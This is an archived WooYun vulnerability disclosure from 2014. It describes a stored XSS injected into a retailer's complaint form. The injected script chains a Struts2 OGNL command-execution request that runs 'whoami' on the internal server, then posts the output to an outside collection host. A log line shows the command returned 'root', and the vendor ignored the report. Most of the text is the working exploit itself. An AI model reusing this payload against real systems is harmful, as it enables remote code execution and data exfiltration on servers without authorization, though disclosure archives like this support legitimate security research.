乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-13: 细节已通知厂商并且等待厂商处理中 2014-09-18: 厂商已经主动忽略漏洞,细节向公众公开
XSS+STRUCT2漏洞检测内网
在吐槽处插入XSS代码
function up_data(data){var up_result;var data=encodeURIComponent(data);var mlhttp=new XMLHttpRequest();mlhttp.onreadystatechange=function(){if(mlhttp.readyState==4){up_result=mlhttp.responseText;}}mlhttp.open("POST","http://www.memeda.pw/g.php",true);mlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");mlhttp.send("data="+data);}function get_web_by_get(url){var lhttp=new XMLHttpRequest();var get_result;lhttp.onreadystatechange=function(){if(lhttp.readyState==4){get_result=lhttp.responseText;}}lhttp.open("GET",url,false)lhttp.send();return get_result;}var sdata=get_web_by_get("/toViewFeedBack.action?('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\[email protected]@EMPTY_SET')(c))&(g)(('\\43req\\[email protected]@getRequest()')(d))&(h)(('\\43webRootzpro\\[email protected]@getRuntime().exec(\\43req.getParameter(%22cmd%22))')(d))&(i)(('\\43webRootzproreader\\75new\\40java.io.DataInputStream(\\43webRootzpro.getInputStream())')(d))&(i01)(('\\43webStr\\75new\\40byte[51020]')(d))&(i1)(('\\43webRootzproreader.readFully(\\43webStr)')(d))&(i111)(('\\43webStr12\\75new\\40java.lang.String(\\43webStr)')(d))&(i2)(('\\43xman\\[email protected]@getResponse()')(d))&(i2)(('\\43xman\\[email protected]@getResponse()')(d))&(i95)(('\\43xman.getWriter().println(\\43webStr12)')(d))&(i99)(('\\43xman.getWriter().close()')(d))&cmd=whoami");up_data(sdata);
2014-09-13 14:59:43-IP:113.98.252.129-Url: http://csc.xiu.com/updateComplaintBillsStatus.action?statusNum=1&feedback.show=0&Id=27473&feedback.id=27473root
T_T都懂,耐心足的应该可以把网站翻了吧~~
危害等级:无影响厂商忽略
忽略时间:2014-09-18 19:32
暂无